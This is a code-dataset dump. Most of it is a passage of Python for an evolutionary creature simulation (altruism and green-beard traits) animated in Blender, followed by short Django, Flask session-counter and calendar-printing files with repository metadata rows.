print("I have no energy after being a samaritan!")
raise Warning('A samaritan died after helping')
day.locations.append([
day.locations[-1][0] + math.cos(day.headings[-1]) * effective_speed / SIM_RESOLUTION,
day.locations[-1][1] + math.sin(day.headings[-1]) * effective_speed / SIM_RESOLUTION,
day.locations[-1][2]
])
#prevent overshoot
x_overshoot = abs(day.locations[-1][0]) - self.world.dimensions[0]
if x_overshoot > 0:
if day.locations[-1][0] > 0:
day.locations[-1][0] -= x_overshoot
else:
day.locations[-1][0] += x_overshoot
y_overshoot = abs(day.locations[-1][1]) - self.world.dimensions[1]
if y_overshoot > 0:
if day.locations[-1][1] > 0:
day.locations[-1][1] -= y_overshoot
else:
day.locations[-1][1] += y_overshoot
self.world_location = day.locations[-1]
#Update energy
day.energies.append(day.energies[-1] - self.energy_cost)
"""
Plan
- sense, speed^2, size^3
- No running, 2x pred ratio
- 100 food - Lots of small, fast creatures. Maybe 1/2 on average
with many in the 0.1 range.
- 200 food - Size about 1 size on average.
- 300 food - Size about 1.25 on average
- No running, 1.2x pred ratio
- 50 food - Size about 1 on average. (few creatures)
- 100 food - Size about 1.25 on average
- 200 food -
- 300 food - 1.5 on average (and seems like it would go further)
- No running, 1.5x pred ratio (Try if preds can't take hold)
- 50 food - Size about 0.7 on average
- 100 food -
- 200 food -
- 300 food - Average about 1.3
- Running (Try if Bigs dominate too much. Not the case so far.)
- 100 food -
- 200 food -
- 300 food -
- sense, speed^2, size^2 (Try if bigs can't take hold.)
-
- sense, speed^2*size^3
- No running, 1.2x pred ratio
- 50 food -
- 100 food -
- 200 food -
- 300 food - Over 1.5 size on average
- sense, speed^2*size^3, size^3
- No running, 1.2x pred ratio
- 50 food - 0.75 average size after 15 gens. 0.9 after 30.
- 100 food -
- 200 food - Size 1.3-1.4 average after 30
- 300 food - Size 1.3-1.4 average after 15 (Maybe still trending?)
- With running, 1.2x pred ratio
- 50 food - 0.7 avg size. Speed high.
- 100 food -
- 200 food -
- 300 food - Size 1.3-1.4 average after 30. Speed is higher.
"""
def eat_animation(self, start_time = None, end_time = None, time_step = 0.3):
if start_time == None:
raise Warning('Need to define start time and end time for eat animation')
if end_time == None:
end_time = start_time + 0.3 #Should make this a constant
start_time = round(start_time * 60) / 60
duration = 50 * time_step * SIM_RESOLUTION
duration = max(round(duration * 60) / 60, 1/30)
end_time = start_time + duration
start_frame = start_time * FRAME_RATE
end_frame = end_time * FRAME_RATE
self.bobject.eat_animation(start_frame = start_frame, end_frame = end_frame)
def add_to_blender(self, appear_time = None, world = None, transition_time = None):
#Note that this is not a subclass of bobject
if appear_time == None:
raise Warning("Must define appear_time to add creature to Blender")
if world == None:
raise Warning("Must define world to add creature to Blender")
cre_bobj = blobject.Blobject(
location = scalar_mult_vec(
self.days[0].locations[0],
world.blender_units_per_world_unit
),
scale = self.size * BASE_CREATURE_SCALE,
rotation_euler = [0, 0, self.days[0].headings[0]],
wiggle = True
)
if self.green_beard == True:
cre_bobj.add_beard(mat = 'color7', low_res = True)
try:
if self.gbo == True:
cre_bobj.add_beard(mat = 'color7', low_res = True)
except:
pass
#Some sims were run before self.gbo existed
#Rotate creature so a ref_obj rotation_euler of [0, 0, 0] results in
#an x-facing blob standing in the z direction
cre_bobj.ref_obj.children[0].rotation_euler = [math.pi / 2, 0, math.pi / 2]
eyes = []
for obj in cre_bobj.ref_obj.children[0].children:
if 'Eye' in obj.name:
eyes.append(obj)
for eye in eyes:
eye.scale = [
self.sense,
self.sense,
self.sense,
]
eye.keyframe_insert(data_path = 'scale', frame = appear_time * FRAME_RATE)
self.bobject = cre_bobj
#apply_material_by_speed(cre_bobj.ref_obj.children[0].children[0], 'creature_color3')
self.apply_material_by_speed()
if transition_time == None:
cre_bobj.add_to_blender(appear_time = appear_time)
else:
cre_bobj.add_to_blender(
appear_time = appear_time,
transition_time = transition_time
)
def apply_material_by_speed(
self,
time = 0,
bobj = None,
spd = None,
obj = None,
):
#2 -> Blue
#6 -> Green
#4 -> Yellow
#3 -> Orange
#5 -> Red
#Kind of ridiculous. Should really just make this a more generalized
#bobject method.
if obj == None:
if bobj == None:
bobj = self.bobject
spd = self.speed
for child in self.bobject.ref_obj.children[0].children:
if child.name[-9:] == 'brd_mball':
obj = child
else:
obj = bobj.ref_obj.children[0]
#Commented out because I just want blue creatures now.
#Such graceful
'''if spd < 1 - 3 * SPEED_PER_COLOR:
color = COLORS_SCALED[0]
elif spd < 1 - 2 * SPEED_PER_COLOR:
#black to purple
range_floor = 1 - 3 * SPEED_PER_COLOR
mix = (spd - range_floor) / SPEED_PER_COLOR
#color = mix_colors(COLORS_SCALED[6], COLORS_SCALED[4], mix)
color = mix_colors(COLORS_SCALED[0], COLORS_SCALED[7], mix)
elif spd < 1 - SPEED_PER_COLOR:
#Purple to blue
range_floor = 1 - 2 * SPEED_PER_COLOR
mix = (spd - range_floor) / SPEED_PER_COLOR
#color = mix_colors(COLORS_SCALED[6], COLORS_SCALED[4], mix)
color = mix_colors(COLORS_SCALED[7], COLORS_SCALED[2], mix)
elif spd < 1:
#Blue to green
range_floor = 1 - SPEED_PER_COLOR
mix = (spd - range_floor) / SPEED_PER_COLOR
#color = mix_colors(COLORS_SCALED[4], COLORS_SCALED[3], mix)
color = mix_colors(COLORS_SCALED[2], COLORS_SCALED[6], mix)
elif spd < 1 + SPEED_PER_COLOR:
#Green to yellow
range_floor = 1
mix = (spd - range_floor) / SPEED_PER_COLOR
color = mix_colors(COLORS_SCALED[6], COLORS_SCALED[4], mix)
#color = mix_colors(COLORS_SCALED[3], COLORS_SCALED[5], mix)
elif spd < 1 + 2 * SPEED_PER_COLOR:
#Yellow to orange
range_floor = 1 + SPEED_PER_COLOR
mix = (spd - range_floor) / SPEED_PER_COLOR
color = mix_colors(COLORS_SCALED[4], COLORS_SCALED[3], mix)
#color = mix_colors(COLORS_SCALED[3], COLORS_SCALED[5], mix)
elif spd < 1 + 3 * SPEED_PER_COLOR:
#Orange to Red
range_floor = 1 + 2 * SPEED_PER_COLOR
mix = (spd - range_floor) / SPEED_PER_COLOR
color = mix_colors(COLORS_SCALED[3], COLORS_SCALED[5], mix)
elif spd < 1 + 4 * SPEED_PER_COLOR:
#Red to white
range_floor = 1 + 3 * SPEED_PER_COLOR
mix = (spd - range_floor) / SPEED_PER_COLOR
color = mix_colors(COLORS_SCALED[5], COLORS_SCALED[1], mix)
else:
color = COLORS_SCALED[1]
apply_material(obj, 'creature_color1')
bobj.color_shift(
duration_time = None,
color = color,
start_time = time - 1 / FRAME_RATE,
shift_time = 1 / FRAME_RATE,
obj = obj
)
'''
apply_material(obj, 'creature_color3')
#Add speed property to bobject for reference when reusing bobjects
bobj.speed = spd
#Not actually used?
def git_ate(self, **kwargs):
diffs = super().git_ate(**kwargs)
#When a creature is eaten, it corrects the position of the things it has
#already eaten that day to offset the effect the grandparent relationship
start_time = kwargs['start_time']
has_eaten = self.days[-1].has_eaten
if len(has_eaten) > 0 and has_eaten[-1] is not None:
for eaten in has_eaten[-1]:
corrected_loc = []
for i, x in enumerate(eaten.bobject.ref_obj.location):
corrected_loc.append(x - diffs[0][i])
corrected_rot = []
for i, x in enumerate(eaten.bobject.ref_obj.rotation_euler):
corrected_rot.append(x - diffs[1][i])
try:
#Change location and rotation
eaten.bobject.move_to(
start_time = start_time,
end_time = start_time + 1 / FRAME_RATE,
new_location = corrected_loc,
new_angle = corrected_rot
)
except:
print(corrected_loc)
print(corrected_rot)
raise()
def is_ancestor(self, creature):
x = creature
while x.parent != None:
if x.parent == self:
return True
x = x.parent
return False
class NaturalSim(object):
"""docstring for NaturalSim."""
def __init__(
self,
food_count = 10,
dimensions = WORLD_DIMENSIONS,
day_length = DEFAULT_DAY_LENGTH,
mutation_chance = MUTATION_CHANCE,
initial_creatures = None,
mutation_switches = {
'speed' : False,
'size' : False,
'sense' : False,
'altruist' : False,
'green_beard' : False,
'gbo' : False,
'a_gb' : False,
'kin_altruist' : False,
'kin_radius' : False,
},
initial_energy = STARTING_ENERGY,
**kwargs
):
self.food_count = food_count
self.initial_energy = initial_energy
self.dimensions = dimensions
self.day_length = day_length
self.mutation_chance = mutation_chance
self.date_records = []
self.mutation_switches = mutation_switches
print(self.mutation_switches)
self.initial_creatures = []
if isinstance(initial_creatures, list):
self.initial_creatures = initial_creatures
elif isinstance(initial_creatures, int):
for i in range(initial_creatures):
self.initial_creatures.append(
Creature(
size = 1 ,#+ randrange(-5, 6) * MUTATION_VARIATION,
speed = 1 ,#+ randrange(-5, 6) * MUTATION_VARIATION,
sense = 1 ,#+ randrange(-5, 6) * MUTATION_VARIATION
)
)
elif initial_creatures == None:
num_creatures = math.floor(self.food_count * 1 / 5)
for i in range(num_creatures):
self.initial_creatures.append(
Creature(
size = 1,# + randrange(-5, 6) * MUTATION_VARIATION,
speed = 1,# + randrange(-5, 6) * MUTATION_VARIATION,
sense = 1,# + randrange(-5, 6) * MUTATION_VARIATION
)
)
#Code for having a distribution of starting stats
"""
step = 2 #Shortcut for messing with set of initial creatures.
for i in range(-1, 2, step):
for j in range(-1, 2, step):
for k in range(-1, 2, step):
#For some reason, I decided I wanted to make initial
#distributions based on colors. /shrug
self.initial_creatures.append(
Creature(
size = 1 + SPEED_PER_COLOR * 0,# * i,
speed = 1 + SPEED_PER_COLOR * 0,# * j,
sense = 1 + SPEED_PER_COLOR * 0,# * k,
)
)
self.initial_creatures.append(
Creature(
size = 1 + SPEED_PER_COLOR * 0,# * i,
speed = 1 + SPEED_PER_COLOR * 0,# * j,
sense = 1 + SPEED_PER_COLOR * 0,# * k,
)
)
"""
for creature in self.initial_creatures:
creature.world = self
def gen_food(self):
food = []
for i in range(self.food_count):
food.append(
Food(
world_location = [
uniform(-self.dimensions[0], self.dimensions[0]),
uniform(-self.dimensions[1], self.dimensions[1]),
2
],
world = self
)
)
return food
def get_newborn_creatures(self, parents = None):
if parents == None:
raise Warning('Must define parents for get_newborn_creatures')
babiiieeesss = []
for par in parents:
if len(par.days[-1].has_eaten[-1]) > 1:
reproduction_chance = 1
elif len(par.days[-1].has_eaten[-1]) > 0:
reproduction_chance = par.days[-1].has_helped * HELP_REP_BOOST
if reproduction_chance > 0:
print('Reproduction chance is ' + str(reproduction_chance) + ' because I helped!')
else:
reproduction_chance = 0
if random() < reproduction_chance:
speed_addition = 0
if self.mutation_switches['speed'] == True:
if random() < self.mutation_chance:
speed_addition = randrange(-1, 2, 2) * MUTATION_VARIATION
size_addition = 0
if self.mutation_switches['size'] == True:
if random() < self.mutation_chance:
size_addition = randrange(-1, 2, 2) * MUTATION_VARIATION
sense_addition = 0
if self.mutation_switches['sense'] == True:
if random() < self.mutation_chance:
sense_addition = randrange(-1, 2, 2) * MUTATION_VARIATION
child_altruist = False
if self.mutation_switches['altruist'] == True:
if random() < self.mutation_chance:
child_altruist = not par.altruist
else:
child_altruist = par.altruist
child_beard = False
if self.mutation_switches['green_beard'] == True:
if random() < self.mutation_chance:
child_beard = not par.green_beard
else:
child_beard = par.green_beard
child_gbo = False
if self.mutation_switches['gbo'] == True:
if random() < self.mutation_chance:
child_gbo = not par.gbo
else:
child_gbo = par.gbo
child_a_gb = False
if self.mutation_switches['a_gb'] == True:
if random() < self.mutation_chance:
child_a_gb = not par.a_gb
else:
child_a_gb = par.a_gb
child_kin_altruist = False
if self.mutation_switches['kin_altruist'] == True:
if random() < self.mutation_chance:
child_kin_altruist = not par.kin_altruist
else:
child_kin_altruist = par.kin_altruist
kin_addition = 0
if self.mutation_switches['kin_radius'] == True:
if random() < self.mutation_chance * 1.73:
#Increase chance by a factor of root 3. Makes it so
#expected trait distance change is equal to expected
#kin radius change.
kin_addition = randrange(-1, 2, 2) * MUTATION_VARIATION
if par.kin_radius + kin_addition < 0:
kin_addition = 0
baby = Creature(
parent = par,
world = par.world,
speed = par.speed + speed_addition,
size = par.size + size_addition,
sense = par.sense + sense_addition,
altruist = child_altruist,
green_beard = child_beard,
a_gb = child_a_gb,
gbo = child_gbo,
kin_altruist = child_kin_altruist,
kin_radius = par.kin_radius + kin_addition,
)
par.children.append(baby)
babiiieeesss.append(baby)
return babiiieeesss
def sim_next_day(
self,
save = False,
filename = None,
filename_seed = None,
anim_durations = DEFAULT_ANIM_DURATIONS,
custom_creature_set = None #For stringing separate sims together
):
"""Initialize date record"""
date = len(self.date_records)
print("Beginning sim for day " + str(date))
if custom_creature_set == None:
if date == 0:
creatures = self.initial_creatures
else:
creatures = [x for x in self.date_records[-1]['creatures'] if x.days[-1].dead == False]
creatures += self.get_newborn_creatures(parents = creatures)
else:
creatures = custom_creature_set
#Set day length based on how long the longest creature can go
day_length = 0
for cre in creatures:
stamina = self.initial_energy / (cre.energy_cost)
if stamina > day_length:
day_length = math.ceil(stamina)
date_dict = {
'date' : date,
'food_objects' : self.gen_food(),
'creatures' : creatures,
'day_length' : day_length, #number of steps in day to show all creatures
'anim_durations' : deepcopy(anim_durations),
'food_given_away': 0,
'food_giving_attempts' : 0,
'martyrs' : 0
}
self.date_records.append(date_dict)
"""print()
for food in date_dict['food_objects']:
print(food.world_location)
print()"""
"""Conduct sim"""
for cre in creatures:
cre.new_day(date = date)
for t in range(date_dict['day_length']):
for cre in creatures:
#take step
cre.take_step()
#At end of day, see which creatures die
#Also shorten day if all creatures are home or dead before the end
latest_action = 0
for cre in date_dict['creatures']:
day = None
bobj = cre.bobject
for candidate_day in cre.days:
if candidate_day.date == date:
day = candidate_day
break
if day.dead == False:
#Not enough food
if len(day.has_eaten[-1]) == 0:
#print(str(cre) + " didn't eat enough")
day.dead = True
was_samaritan = False
for sta in day.states:
if sta == 'samaritan':
was_samaritan = True
if was_samaritan == True:
print("I had zero food after being a samaritan, somehow!")
#Didn't make it home
if (abs(day.locations[-1][0]) < self.dimensions[0] and \
abs(day.locations[-1][1]) < self.dimensions[1]):
#print(str(cre) + " didn't make it home")
day.dead = True
was_samaritan = False
for sta in day.states:
if sta == 'samaritan':
was_samaritan = True
if was_samaritan == True:
print("I didn't make it home after being a samaritan!")
'''was_samaritan = False
for sta in day.states:
if sta == 'samaritan':
was_samaritan = True
if was_samaritan == True:
print("I was a samaritan!")'''
#Shorten for animation
if day.death_time != None and day.death_time > latest_action:
latest_action = day.death_time
#print('New day length: ' + str(latest_action))
if day.home_time != None and day.home_time > latest_action:
latest_action = day.home_time
#print('New day length: ' + str(latest_action))
#print(date_dict['date'], latest_action)
date_dict['day_length'] = latest_action
#Gather info on altruism in previous day
#Also check whether a creature is there more than once
documented_creatures = []
for cre in date_dict['creatures']:
if cre in documented_creatures:
raise Warning('Date dict creature list has duplicate creatures')
documented_creatures.append(cre)
day = cre.days[-1]
##Food given away
date_dict['food_given_away'] += day.has_helped
##Attempts
states = day.states
was_samaritan = False
for i in range(1, len(states)):
if states[i] == 'samaritan':
was_samaritan = True
if states[i-1] != 'samaritan':
date_dict['food_giving_attempts'] += 1
if was_samaritan == True and day.dead == True:
date_dict['martyrs'] += 1
print('Recorded martyr')
if save == True:
self.save_sim_result(filename, filename_seed)
def save_sim_result(self, filename, filename_seed):
if filename != None:
name = filename
elif filename_seed != None:
k = 0
directory = os.fsencode(SIM_DIR)
while k <= len(os.listdir(directory)):
#print('looking in dir')
name_to_check = str(filename_seed) + '_' + str(k)
already_exists = False
for existing_file in os.listdir(directory):
existing_file_name = os.fsdecode(existing_file)[:-4]
#print(name_to_check)
#print(existing_file_name)
if existing_file_name == name_to_check:
already_exists = True
#print(already_exists)
if already_exists:
k += 1
else:
name = name_to_check
break
else:
now = datetime.datetime.now()
name = "NAT" + now.strftime('%Y%m%dT%H%M%S')
#name = 'test'
result = os.path.join(
SIM_DIR,
name
) + ".pkl"
if not os.path.exists(result):
print("Writing simulation to %s" % (result))
with open(result, "wb") as outfile:
pickle.dump(self, outfile, pickle.HIGHEST_PROTOCOL)
else:
raise Warning(str(result) + " already exists")
class DrawnNaturalSim(Bobject):
def __init__(
self,
*subbobjects,
sim = None,
save = False,
loud = True,
start_delay = 1,
blender_units_per_world_unit = BLENDER_UNITS_PER_WORLD_UNIT,
day_length_style = 'fixed_speed', #Can also be 'fixed_length'
**kwargs
):
super().__init__(*subbobjects, **kwargs)
self.day_length_style = day_length_style
if isinstance(sim, NaturalSim):
self.sim = sim
elif isinstance(sim, str):
result = os.path.join(
SIM_DIR,
sim
) + ".pkl"
if loud:
print(result)
with open(result, 'rb') as input:
if loud:
print(input)
self.sim = pickle.load(input)
if loud:
print("Loaded the world")
elif sim == None:
#I was previously passing on only certain kwargs, but I'm not sure
#why I don't send them all. Makes it easier to use a new kwarg.
"""sim_kwargs = {}
for param in ['food_count', 'dimensions', 'day_length']:
if param in kwargs:
sim_kwargs[param] = kwargs[param]"""
self.sim = NaturalSim(**kwargs)
self.blender_units_per_world_unit = blender_units_per_world_unit
#As written, changing this will change some proportions, since some
#other constants depend on the default value
self.start_delay = start_delay
#self.reusable_food_bobjs = []
self.reusable_cre_bobjs = []
food_bobject_model = import_object(
'goodicosphere', 'primitives',
#world_location = [0, 0, 0],
#location = [0, 0, 0],
#scale = FOOD_SCALE
)
self.food_object_model = food_bobject_model.ref_obj.children[0]
apply_material(self.food_object_model, 'color7')
def animate_days(self, start_day, end_day):
if end_day == None:
end_day = len(self.sim.date_records) - 1
for i in range(start_day, end_day + 1):
date_record = self.sim.date_records[i]
print("Animating day " + str(i))
"""Place food"""
print(" Placing food")
def place_food():
for j, food in enumerate(date_record['food_objects']):
delay = j * date_record['anim_durations']['dawn'] / len(date_record['food_objects'])
duration_frames = min(
OBJECT_APPEARANCE_TIME,
date_record['anim_durations']['dawn'] * FRAME_RATE - delay * FRAME_RATE
)
food.bobject = bobject.Bobject(
objects = [self.food_object_model.copy()],
scale = FOOD_SCALE
)
food.bobject.ref_obj.parent = self.ref_obj
'''if len(self.reusable_food_bobjs) == 0:
food.add_to_blender()
food.bobject.ref_obj.parent = self.ref_obj
else:
bobj = self.reusable_food_bobjs.pop()
bobj.scale = [FOOD_SCALE, FOOD_SCALE, FOOD_SCALE]
for cons in bobj.ref_obj.constraints:
cons.keyframe_insert(
data_path = 'influence',
frame = (self.start_time + self.elapsed_time + delay) * FRAME_RATE - 1
)
cons.influence = 0
cons.keyframe_insert(
data_path = 'influence',
frame = (self.start_time + self.elapsed_time + delay) * FRAME_RATE
)
food.bobject = bobj'''
starting_loc = scalar_mult_vec(
food.world_location,
self.blender_units_per_world_unit
)
#This line primes move_to to have food on first day start
#in the right place
#if i == 0:
food.bobject.ref_obj.location = starting_loc
'''food.bobject.move_to(
new_location = starting_loc,
start_time = self.start_time + self.elapsed_time + delay - 1 / FRAME_RATE,
end_time = self.start_time + self.elapsed_time + delay
)'''
food.bobject.add_to_blender(
appear_time = self.start_time + self.elapsed_time + delay,
transition_time = duration_frames
)
place_food()
"""Place new creatures"""
print(" Placing creatures")
def place_creatures():
duration_frames = min(
OBJECT_APPEARANCE_TIME,
date_record['anim_durations']['dawn'] * FRAME_RATE
)
if date_record['date'] == start_day:
#print(" Adding new creatures on initial day")
for cre in date_record['creatures']:
cre.add_to_blender(
appear_time = self.start_time + self.elapsed_time,
world = self,
transition_time = duration_frames
)
cre.bobject.ref_obj.parent = self.ref_obj
else:
#print(" Looking to reuse creature objects")
for cre in date_record['creatures']:
if cre not in self.sim.date_records[i - 1]['creatures']:
#print(' Found a creature that isn\'t in previous day')
reusables = [x for x in self.reusable_cre_bobjs if x.speed == cre.speed]
#if len(self.reusable_cre_bobjs) > 0:
if len(reusables) > 0:
#print(' Reusing a bobject')
bobj = reusables[-1]
#bobj = self.reusable_cre_bobjs[-1]
#print()
#print(bobj.name)
#print([x.name for x in self.reusable_cre_bobjs])
self.reusable_cre_bobjs.remove(bobj)
#print([x.name for x in self.reusable_cre_bobjs])
#print()
location = scalar_mult_vec(
cre.days[0].locations[0],
self.blender_units_per_world_unit
)
rotation_euler = [0, 0, cre.days[0].headings[0]]
bobj.move_to(
new_location = location,
new_angle = rotation_euler,
start_time = self.start_time + self.elapsed_time - 1 / FRAME_RATE,
end_time = self.start_time + self.elapsed_time
)
bobj.scale = [cre.size * BASE_CREATURE_SCALE] * 3
bobj.add_to_blender(
appear_time = self.start_time + self.elapsed_time,
transition_time = duration_frames
)
eyes = []
for obj in bobj.ref_obj.children[0].children:
if 'Eye' in obj.name:
eyes.append(obj)
for eye in eyes:
eye.keyframe_insert(data_path = 'scale', frame = (self.start_time + self.elapsed_time) * FRAME_RATE - 1)
eye.scale = [
cre.sense,
cre.sense,
cre.sense,
]
eye.keyframe_insert(data_path = 'scale', frame = (self.start_time + self.elapsed_time) * FRAME_RATE)
cre.bobject = bobj
#For some reason, this produces broken matertials
#So above, we just choose bobjects from creatures
#with the same speed. This takes more memory.
if cre.bobject.speed != cre.speed:
cre.apply_material_by_speed(time = self.start_time + self.elapsed_time)
else:
#print(' Just making a new one')
cre.add_to_blender(
appear_time = self.start_time + self.elapsed_time,
world = self,
transition_time = duration_frames
)
cre.bobject.ref_obj.parent = self.ref_obj
"""cres = date_record['creatures']
for k in range(len(cres)):
for j in range(k):
if cres[k].bobject == cres[j].bobject:
#print(cres[k].bobject.name)
raise Warning('Two creatures are sharing a bobject')"""
self.elapsed_time += date_record['anim_durations']['dawn'] + \
date_record['anim_durations']['morning']
place_creatures()
"""Step through time for current day"""
print(" Animating movements")
#print(date_record['day_length'])
def step_through_day():
if self.day_length_style == 'fixed_speed':
time_step = DEFAULT_DAY_ANIM_DURATION / DEFAULT_DAY_LENGTH
elif self.day_length_style == 'fixed_length':
if date_record['day_length'] == 0:
self.elapsed_time += date_record['anim_durations']['day']
self.elapsed_time += date_record['anim_durations']['evening']
return
time_step = 1 / date_record['day_length'] * date_record['anim_durations']['day']
#Reduce number of keyframes when there's two or more per frame.
#Number of time steps in one frame
'''key_every_n_t = math.floor(1 / FRAME_RATE / time_step)
if key_every_n_t < 1:
key_every_n_t = 1'''
key_every_n_t = 1
#print(str(date_record['date']) + ' ' + str(len(date_record['creatures'])))
for t in range(date_record['day_length']):
time_of_day = t * time_step
anim_time = self.start_time + self.elapsed_time + time_of_day
frame = anim_time * FRAME_RATE
#TODO: check for food eating ties. Eh, maybe not.
for cre in date_record['creatures']:
day = None
obj = cre.bobject.ref_obj
day = [x for x in cre.days if x.date == date_record['date']][0]
#The [0] is just a way of plucking the value from a list
#which should be of length 1
#If None, the creature was eaten by this point
if day.locations[t] != None:
if t % key_every_n_t == 0:
obj.location = scalar_mult_vec(
day.locations[t],
self.blender_units_per_world_unit
)
obj.keyframe_insert(data_path = 'location', frame = frame)
obj.rotation_euler = [0, 0, day.headings[t]]
obj.keyframe_insert(data_path = 'rotation_euler', frame = frame)
#Old version that called git_ate on all new food,
#Even if it's food that was actually eaten previously
#by the creature currently being eaten. Resulted in
#unnecessary and problematic position corrections.
#Keeping as comment for now in case new version is
#problematic too.
"""for food in day.has_eaten[t]:
if food not in day.has_eaten[t-1]:
food.git_ate(
eater = cre,
start_time = anim_time,
drawn_world = self,
time_step = time_step
)"""
#May cause bugs if a creature eats two things on the
#same time step.
if len(day.has_eaten[t]) > 0:
last_eaten = day.has_eaten[t][-1]
#was_eaten_not_shared = (last_eaten.was_shared == False or len(day.has_eaten) > 1)
#if last_eaten.was_shared == True:
# print(last_eaten.bobject.ref_obj.name)
if last_eaten not in day.has_eaten[t-1] and \
len(last_eaten.bobject.ref_obj.constraints) == 0:
#was_eaten_not_shared == True:
#Second condition avoids erroneous animations
#for shared_food
last_eaten.git_ate(
eater = cre,
start_time = anim_time,
drawn_world = self,
time_step = time_step
)
'''if isinstance(last_eaten, Creature):
pass
#There's another place where creatures are
#added to the reusable pile.
#self.reusable_cre_bobjs.append(last_eaten.bobject)
else:
self.reusable_food_bobjs.append(last_eaten.bobject)'''
''' Older version that didn't update date record if speed is fixed
if self.day_length_style == 'fixed_length':
self.elapsed_time += date_record['anim_durations']['day']
elif self.day_length_style == 'fixed_speed':
self.elapsed_time += date_record['day_length'] * time_step'''
if self.day_length_style == 'fixed_speed':
date_record['anim_durations']['day'] = date_record['day_length'] * time_step
self.elapsed_time += date_record['anim_durations']['day']
self.elapsed_time += date_record['anim_durations']['evening']
step_through_day()
"""Creatures that die should disappear."""
"""Along with food"""
print(" Cleaning up")
def clean_up():
duration_frames = min(
OBJECT_APPEARANCE_TIME,
date_record['anim_durations']['night'] * FRAME_RATE
)
for cre in date_record['creatures']:
day = None
for cons in cre.bobject.ref_obj.constraints:
if cons.influence == 1:
cons.keyframe_insert(
data_path = 'influence',
frame = (self.start_time + self.elapsed_time + date_record['anim_durations']['night']) * FRAME_RATE - 1
)
cons.influence = 0
cons.keyframe_insert(
data_path = 'influence',
frame = (self.start_time + self.elapsed_time + date_record['anim_durations']['night']) * FRAME_RATE
)
for candidate_day in cre.days:
if candidate_day.date == date_record['date']:
day = candidate_day
break
if day.dead == True:
cre.bobject.disappear(
disappear_time = self.start_time + self.elapsed_time + date_record['anim_durations']['night'],
#is_creature = True,
duration_frames = duration_frames
)
#if cre.is_eaten = False:
self.reusable_cre_bobjs.append(cre.bobject)
else:
cre.bobject.move_to(
new_angle = [
cre.bobject.ref_obj.rotation_euler[0],
cre.bobject.ref_obj.rotation_euler[1],
cre.bobject.ref_obj.rotation_euler[2] + math.pi
],
start_time = self.start_time + self.elapsed_time,
end_time = self.start_time + self.elapsed_time + date_record['anim_durations']['night']
)
try: #This is for putting surviving creatures away if the
#next day is actually another sim.
next_day = self.sim.date_records[i + 1]
if cre not in next_day['creatures']:
cre.bobject.disappear(
disappear_time = self.start_time + self.elapsed_time + date_record['anim_durations']['night'],
#is_creature = True,
duration_frames = duration_frames
)
self.reusable_cre_bobjs.append(cre.bobject)
except:
pass
for food in date_record['food_objects']:
'''for cons in food.bobject.ref_obj.constraints:
cons.keyframe_insert(
data_path = 'influence',
frame = (self.start_time + self.elapsed_time + date_record['anim_durations']['night']) * FRAME_RATE - 1
)
cons.influence = 0
cons.keyframe_insert(
data_path = 'influence',
frame = (self.start_time + self.elapsed_time + date_record['anim_durations']['night']) * FRAME_RATE
)'''
if food.is_eaten == False:
food.bobject.disappear(
disappear_time = self.start_time + self.elapsed_time + date_record['anim_durations']['night'],
duration_frames = duration_frames# / 2
)
#self.reusable_food_bobjs.append(food.bobject)
self.elapsed_time += date_record['anim_durations']['night']
clean_up()
def add_to_blender(
self,
start_delay = None,
start_day = 0,
end_day = None,
**kwargs
):
if 'appear_time' not in kwargs:
raise Warning('Need appear_time to add natural sim.')
self.start_time = kwargs['appear_time']
#Already set in __init__, but can be set again here
if start_delay != None:
self.start_delay = start_delay
self.elapsed_time = self.start_delay #Will add to this as phases are
#animated to keep them sequential
#Adjust elapsed_time if start day not 0
for i in range(start_day):
day = self.sim.date_records[i]
self.elapsed_time += day['anim_durations']['dawn'] + \
day['anim_durations']['morning'] + \
day['anim_durations']['day'] + \
day['anim_durations']['evening'] + \
day['anim_durations']['night']
plane = import_object(
'xyplane', 'primitives',
scale = [
self.sim.dimensions[0] * self.blender_units_per_world_unit,
self.sim.dimensions[1] * self.blender_units_per_world_unit,
0
],
location = (0, 0, 0),
name = 'sim_plane'
)
apply_material(plane.ref_obj.children[0], 'color2')
self.add_subbobject(plane)
super().add_to_blender(**kwargs)
#execute_and_time(
# 'Animated day',
self.animate_days(start_day, end_day),
#
| [
"syedfaizanhussain94@gmail.com"
] | syedfaizanhussain94@gmail.com |
cce3f02bf224ac4fd4a742c1e3447c7135e07cca | 7ad4ef003ca4555cfa0eb75045c7895fb817429a | /frontend/models.py | a0b6ced04602d3dd55fa976dc52d677aa66f3836 | [] | no_license | K-gns/MySite | c949d7e3e5693705a04dc0d60fe6410d7dff527b | ae26e6bc839eba1cdf1f724c991fb5e3a329b257 | refs/heads/main | 2023-05-21T21:38:38.886150 | 2021-06-13T15:43:28 | 2021-06-13T15:43:28 | 361,487,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | from django.db import models
from django.conf import settings
from django.contrib.auth.models import User
from user_profile.models import MainCycle, Boost
| [
"kb465@mail.ru"
] | kb465@mail.ru |
d97172650fbf494f48bcbcba5842c6bd9d488899 | 28331cad1f61e41e6da2a4e221ec2776974e14a6 | /server.py | 2749887fbd22f20b8929d1c8185a689f3f0699c4 | [] | no_license | chaocharliehuang/FlaskCounter | 5ba0c0708460dafe80554b0dc712a6161cedae6e | f7c24378682f9f92036b48be29a148557cfecc25 | refs/heads/master | 2020-12-02T18:01:00.312014 | 2017-07-06T19:09:51 | 2017-07-06T19:09:51 | 96,461,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | from flask import Flask, render_template, redirect, session
app = Flask(__name__)
app.secret_key = 'secret'
@app.route('/')
def index():
if session.get('count'):
session['count'] += 1
else:
session['count'] = 1
return render_template('index.html')
@app.route('/add2', methods=['POST'])
def add2():
session['count'] += 1
return redirect('/')
@app.route('/reset', methods=['POST'])
def reset():
session['count'] = 0
return redirect('/')
app.run(debug=True) | [
"chaocharliehuang@gmail.com"
] | chaocharliehuang@gmail.com |
2ec14bf6f34984991ab45b18102ceb8a9bd71ef3 | 7d1b5d963737926e323890e5a89fd4bcd9a925a2 | /test/year.py | a2ad37263ddc9a473804893b34701bf27db64992 | [] | no_license | zhaowan1/python | af1cccd507f86542e8a4adbcd7ed445db8f2abf0 | 3456bf9560caefc279f584e1652806712f30dc12 | refs/heads/master | 2020-03-11T01:41:51.053258 | 2018-04-16T07:04:34 | 2018-04-16T07:04:34 | 129,698,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 227 | py | '''
Created on 2018年4月10日
@author: Administrator
'''
#coding:utf-8
import calendar
print ("Show a given years monthly calendar")
print ('')
year = int(input("Enter the year"))
print ('')
calendar.prcal(year)
print ('')
| [
